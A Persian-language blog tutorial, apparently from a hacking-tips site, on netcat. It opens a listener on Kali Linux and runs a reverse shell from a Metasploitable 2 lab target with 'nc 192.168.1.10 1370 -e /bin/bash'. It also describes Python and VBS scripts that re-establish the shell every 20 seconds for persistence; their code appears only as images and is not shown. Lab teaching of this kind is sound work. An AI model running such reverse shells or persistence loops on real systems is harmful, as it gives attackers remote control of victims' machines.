درباره نتکت بیشتر بدانیم

منتشر شده در دسته : بلاگ, راهکارهای هکر

قبلا درباره نتکت مطالبی را منتشر کرده ایم. نت کت یک ابزار شبکه و معروف به چاقوی سوییسی می باشد که تقریبا بر روی همه توزیع های لینوکس به صورت پیش فرض نصب شده است. ابزار نت کت قادر به خواندن و نوشتن در پورت های TCP و UDP می باشد. از این ابزار می توان به منظور ایجاد یک ارتباط بازگشتی روی سیستم هدف استفاده کرد.

درباره نتکت

در اینجا کمتر توضیح می دهیم و مستقیم وارد تست می شویم . سیستم هدف ما Metasploitable 2 می باشد که سیستم لینوکس می باشد. شما می توانید از هر توزیع لینوکس دیگری استفاده کنید. آدرس آیپی سیستم هدف را با وارد کردن دستور ifconfig بدست آورید.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

به منظور مشاهده لیست کامل فایل های راهنما دستور زیر را در کنسول کالی لینوکس وارد می کنیم :

nc -help

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

به منظور ایجاد یک شنوند در سمت سیستم کالی دستور زیر را وارد می کنیم. شنونده بر روی پورت مورد نظر منتظر مانده تا یک ارتباط بازگشتی از سمت سیستم هدف ایجاد گردد. در اینجا سوییچ l- برای listen یا گوش کردن و p- تعیین کننده پورت بازگشتی و سوییچ v- مخفف verbose به منظور نمایش طولانی تر نتایج در کنسول می باشد. اکنون نت کت در کالی بر روی پورت ۱۳۷۰ گوش می کند و منتظر ارتباط بازگشتی است.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

آدرس آیپی سیستم کالی را با استفاده از دستور ifconfig بدست آورید.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

اگر به سیستم هدف رفته و دستور زیر را وارد کنیم یک ارتباط بر روی پورت ۱۳۷۰ شروع می شود.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

به کالی بازگردید و مشاهده می کنید که ارتباط معکوس ایجاد شده است.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

هر پیامی که درون کنسول کالی یا کنسول سیستم هدف وارد کنید در طرفین نمایش داده می شود .

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

درست مثل یک ارتباط چت متنی

ولی این کافی نیست . می خواهیم استفاده بیشتری از این ارتباط ببریم . یک بار دیگر مثل قبل شنونده را در کالی فعال می کنیم.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

این بار در سمت سیستم هدف با استفاده از سوییچ e- بش را به ارتباط نتکت خود اضافه می کنیم :

nc 192.168.1.10 1370 -e /bin/bash

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

اگر به کالی بازگردیم مشاهده می کنیم که ارتباط بازگشتی ایجاد شده ولی این یک ارتباط بازگشتی ساده نیست بلکه می توانیم از این طریق دستورات مورد نظر خود را به صورت مستقیم بر روی سیستم هدف اجرا کنیم و نتیجه را مشاهده کنیم . مثلا در زیر ابتدا دستور ls را وارد کرده و سپس با / cd پوشه را تغییر داده و بازهم محتویات را می بینیم.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

خوب تا اینجای کار دستورات ساده نتکت را بیان کردیم. اکنون می خواهیم دو اسکریپت به شما معرفی کنیم که با استفاده از آنها ارتباط بازگشتی پایدار ایجاد کنید . اول برای لینوکس

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

اسکریپت پایتون بالا برای لینوکس کاربرد دارد و پس از اجرا بر روی سیستم هدف سعی در ایجاد یک ارتباط بازگشتی با سیستم مبدا از طریق نتکت می کند. while true یعنی تا زمانی که ارتباط ایجاد نشده است برقرار است. در ادامه با استفاده از کتابخانه time و متد sleep یک تایمر با زمان ۲۰ ثانیه ایجاد می کنیم. یعنی در صورتیکه ارتباط بازگشتی نت کت ایجاد نشد ۲۰ ثانیه صبر کن و دوباره حلقه را اجرا کن.

برای اجرا ابتدا مثل قبل یک شنونده در کالی ایجاد می کنیم.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

سپس بر روی سیستم هدف (که یک سیستم لینوکس دیگر می باشد و شما می توانید از هر سیستم لینوکسی برای تست استفاده کنید) اقدام به اجرای اسکریپت پایتون می کنیم. برای اجرای اسکریپت پایتون کنسول را باز کنید و دستور زیر را وارد کنید :

python nc-netamooz.py

پس از اجرای اسکریپت ارتباط بازگشتی نت کت ایجاد می شود و به شل دسترسی دارید و این موضوع را با وارد کردن دستورهای مختلف می توانید اثبات کنید . این اسکریپت چه تفاوتی با مورد قبلی داشت ؟

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

اگر ارتباط را با وارد کردن Ctrl+C قطع کنید و مجددا اقدام به ایجاد شنونده کنید و ۲۰ ثانیه منتظر بمانید (دیگر نیازی به اجرای مجدد اسکریپت پایتون بر روی سیستم هدف نیست) مشاهده می کنید که ارتباط بازگشتی به صورت خودکار پس از ۲۰ ثانیه دوباره برقرار می شود. به این صورت پایداری اجرای شما افزایش یافته و شما تنها بایستی یکبار اسکریپت را بر روی سیستم هدف اجرا کنید.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

همین کار را می توانید با استفاده از اسکریپت وی بی اسکریپت زیر در ویندوز انجام دهید. دقت کنید که سیستم عامل ویندوز شما دارای نت کت باشد و در صورتیکه نیست بایستی نت کت در مسیر تعیین شده در اسکریپت (در اینجا مسیر C:windowsnc.exe قرار بگیرد) . همچنین درون این اسکریپت زمان به میلی ثانیه می باشد.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

بار دیگر شنونده را در کالی لینوکس فعال کنید :

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

به ویندوز رفته و اسکریپت vbs را اجرا کنید.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

پس از اجرا یک ارتباط بازگشتی ایجاد می شود و شما به شل بر روی ویندوز دسترسی پیدا می کنید.

نتکت - درباره نتکت بیشتر بدانیم - ابزار نتکت - کاربرد ابزار نتکت

یک دیدگاه

خوشحال می شویم دیدگاههای خود را در میان بگذارید * فرصت پاسخگویی به سوالات در بلاگ وجود ندارد

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *